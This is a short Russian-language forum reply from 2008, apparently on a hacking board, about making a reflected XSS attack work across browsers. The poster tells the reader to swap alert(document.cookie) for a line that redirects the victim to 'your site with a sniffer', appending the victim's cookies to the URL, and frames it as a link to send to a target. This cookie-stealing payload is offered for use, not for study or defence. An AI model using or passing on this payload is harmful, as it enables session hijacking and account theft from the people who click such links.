
29.11.2008, 22:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:
вместо alert(document.cookie) просто вставь
window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;
|
|
|